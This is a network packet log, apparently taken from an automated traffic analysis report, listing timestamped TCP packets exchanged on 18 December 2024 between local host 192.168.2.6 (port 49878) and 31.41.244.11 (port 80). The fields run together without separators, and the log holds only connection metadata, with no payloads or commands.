                                                                                                                                                              Dec 18, 2024 11:47:43.172557116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.177001953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.177087069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.177118063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.177181005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.181613922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.181684017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.181706905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.181751013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.186170101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.186235905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.186327934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.186374903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.190753937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.190782070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.190804958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.190825939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.195363998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.195417881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.195432901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.195466995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.199906111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.199973106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.200018883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.200057983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.204679966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.204745054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.204833984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.204875946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.209111929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.209171057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.209206104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.209244967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.222161055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.222223043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.222337961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.222383976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.224716902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.224757910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.224792004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.224828005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.243244886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.243343115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.292188883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.292246103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.292269945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.292305946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.294272900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.294332027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.315192938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.315212011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.315274000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.315325975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.317101002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.317117929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.317142963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.317159891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.320467949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.320557117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.320611000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.320646048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.323474884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.323532104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.323740959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.323779106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.327908039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.327924967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.327975035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.330363035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.330421925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.330445051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.330477953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.335938931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.335956097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.336025000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.336046934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.337920904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.337938070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.337980032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.337991953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.340650082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.340676069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.340715885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.342320919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.343547106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.343619108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.343652010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.343693972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.346772909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.346838951 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.346878052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.346916914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.350028038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.350084066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.350133896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.350176096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.352049112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.352104902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.352108955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.352140903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.353986025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.354037046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.354058981 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.354098082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.356010914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.356066942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.356085062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.356125116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.357978106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.358028889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.358156919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.358208895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.359951019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.360001087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.360174894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.360224009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.361871958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.361921072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.361962080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.362004042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.363801956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.363852024 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.363898039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.363929987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.365756035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.365806103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.365926027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.365967035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.367746115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.367794037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.367811918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.367852926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.369729042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.369780064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.369823933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.369865894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.371639013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.371654987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.371687889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.371702909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.373527050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.373577118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.373661995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.373703957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.375463963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.375519991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.375524044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.375562906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.377438068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.377487898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.377504110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.377538919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.379396915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.379442930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.379452944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.379492044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.381263018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.381313086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.381352901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.381392002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.383164883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.383208036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.383265018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.383299112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.385092974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.385145903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.385248899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.385288954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.387001038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.387046099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.387083054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.387120962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.388930082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.388977051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.389034033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.389075994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.390810013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.390858889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.390935898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.390976906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.396336079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.396356106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.396395922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.396418095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.483359098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.483424902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.483458042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.483498096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.484266043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.484313011 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.484428883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.484469891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.486222029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.486273050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.507045984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.507112026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.507126093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.507167101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.507597923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.507646084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.507747889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.507795095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.509232998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.509366035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.509474993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.509524107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.510797024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.510844946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.510909081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.510967016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.512291908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.512341976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.512398005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.512437105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.513902903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.513969898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.514017105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.514059067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.515336990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.515387058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.515400887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.515440941 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.516901016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.516947985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.517021894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.517066002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.518279076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.518342018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.518409967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.518448114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.519799948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.519843102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.519906998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.519946098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.521332026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.521378994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.521387100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.521437883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.522839069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.522886038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.522895098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.522945881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.524310112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.524358988 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.524456978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.524502039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.525890112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.525944948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.526022911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.526061058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.527425051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.527472019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.527475119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.527512074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.528835058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.528888941 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.528973103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.529017925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.530409098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.530464888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.530487061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.530538082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.531815052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.531860113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.531878948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.531917095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.533308983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.533359051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.533454895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.533493996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.534822941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.534876108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.534923077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.534998894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.536283016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.536330938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.536340952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.536377907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.537779093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.537830114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.537877083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.537914991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.539238930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.539345026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.539367914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.539385080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.540751934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.540817976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.540847063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.540888071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.542342901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.542385101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.542407990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.542447090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.543754101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.543797970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.543852091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.543889046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.545325041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.545360088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.545375109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.545392990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.546741009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.546789885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.546938896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.546977997 CET4987880192.168.2.631.41.244.11
